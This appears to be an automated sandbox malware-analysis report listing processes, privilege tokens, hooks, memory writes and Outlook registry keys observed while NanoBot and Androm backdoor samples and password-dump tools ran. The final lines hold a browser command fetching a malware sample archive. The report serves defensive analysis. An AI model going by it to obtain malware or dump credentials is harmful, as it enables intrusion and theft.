5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
2968	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe
2968	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

3416 RegAsm.exe

pid	process
3416	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exeRegAsm.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exedw20.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeGetBP.exeEmailPasswordDump.exeFTPPasswordDump.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe

description	pid	process
Token: SeRestorePrivilege	4348	7zFM.exe
Token: 35	4348	7zFM.exe
Token: SeSecurityPrivilege	4348	7zFM.exe
Token: SeDebugPrivilege	4240	RegAsm.exe
Token: SeSecurityPrivilege	4348	7zFM.exe
Token: SeSecurityPrivilege	4348	7zFM.exe
Token: SeRestorePrivilege	4352	7z.exe
Token: 35	4352	7z.exe
Token: SeSecurityPrivilege	4352	7z.exe
Token: SeSecurityPrivilege	4352	7z.exe
Token: SeRestorePrivilege	2808	7z.exe
Token: 35	2808	7z.exe
Token: SeSecurityPrivilege	2808	7z.exe
Token: SeSecurityPrivilege	2808	7z.exe
Token: SeRestorePrivilege	1444	7z.exe
Token: 35	1444	7z.exe
Token: SeSecurityPrivilege	1444	7z.exe
Token: SeSecurityPrivilege	1444	7z.exe
Token: SeRestorePrivilege	2884	7z.exe
Token: 35	2884	7z.exe
Token: SeSecurityPrivilege	2884	7z.exe
Token: SeSecurityPrivilege	2884	7z.exe
Token: SeRestorePrivilege	2216	7z.exe
Token: 35	2216	7z.exe
Token: SeSecurityPrivilege	2216	7z.exe
Token: SeSecurityPrivilege	2216	7z.exe
Token: SeRestorePrivilege	3424	7z.exe
Token: 35	3424	7z.exe
Token: SeSecurityPrivilege	3424	7z.exe
Token: SeSecurityPrivilege	3424	7z.exe
Token: SeRestorePrivilege	712	7z.exe
Token: 35	712	7z.exe
Token: SeSecurityPrivilege	712	7z.exe
Token: SeSecurityPrivilege	712	7z.exe
Token: SeRestorePrivilege	3488	7z.exe
Token: 35	3488	7z.exe
Token: SeSecurityPrivilege	3488	7z.exe
Token: SeSecurityPrivilege	3488	7z.exe
Token: SeRestorePrivilege	3908	7z.exe
Token: 35	3908	7z.exe
Token: SeSecurityPrivilege	3908	7z.exe
Token: SeSecurityPrivilege	3908	7z.exe
Token: SeRestorePrivilege	1932	7z.exe
Token: 35	1932	7z.exe
Token: SeSecurityPrivilege	1932	7z.exe
Token: SeSecurityPrivilege	1932	7z.exe
Token: SeRestorePrivilege	1168	7z.exe
Token: 35	1168	7z.exe
Token: SeSecurityPrivilege	1168	7z.exe
Token: SeSecurityPrivilege	1168	7z.exe
Token: SeRestorePrivilege	2340	7z.exe
Token: 35	2340	7z.exe
Token: SeSecurityPrivilege	2340	7z.exe
Token: SeSecurityPrivilege	2340	7z.exe
Token: SeBackupPrivilege	2572	dw20.exe
Token: SeBackupPrivilege	2572	dw20.exe
Token: SeSecurityPrivilege	4348	7zFM.exe
Token: SeDebugPrivilege	3172	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
Token: SeSecurityPrivilege	4348	7zFM.exe
Token: SeSecurityPrivilege	4348	7zFM.exe
Token: SeDebugPrivilege	744	GetBP.exe
Token: SeDebugPrivilege	2328	EmailPasswordDump.exe
Token: SeDebugPrivilege	4964	FTPPasswordDump.exe
Token: SeDebugPrivilege	2008	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exeBackdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe

pid	process
4348	7zFM.exe
4348	7zFM.exe
4348	7zFM.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
4348	7zFM.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe

pid	process
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXERegAsm.exe

pid process

1980 WINWORD.EXE
1980 WINWORD.EXE
1980 WINWORD.EXE
1980 WINWORD.EXE
1980 WINWORD.EXE
1980 WINWORD.EXE
3416 RegAsm.exe

pid	process
1980	WINWORD.EXE
1980	WINWORD.EXE
1980	WINWORD.EXE
1980	WINWORD.EXE
1980	WINWORD.EXE
1980	WINWORD.EXE
3416	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1872 wrote to memory of 4668	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4668	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 4820	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 748	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 748	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe
PID 1872 wrote to memory of 3904	1872	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4944 attrib.exe

pid	process
4944	attrib.exe

outlook_office_path 1 IoCs

Processes:

HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe

outlook_win_path 1 IoCs

Processes:

HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z
1⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5032 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:1384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
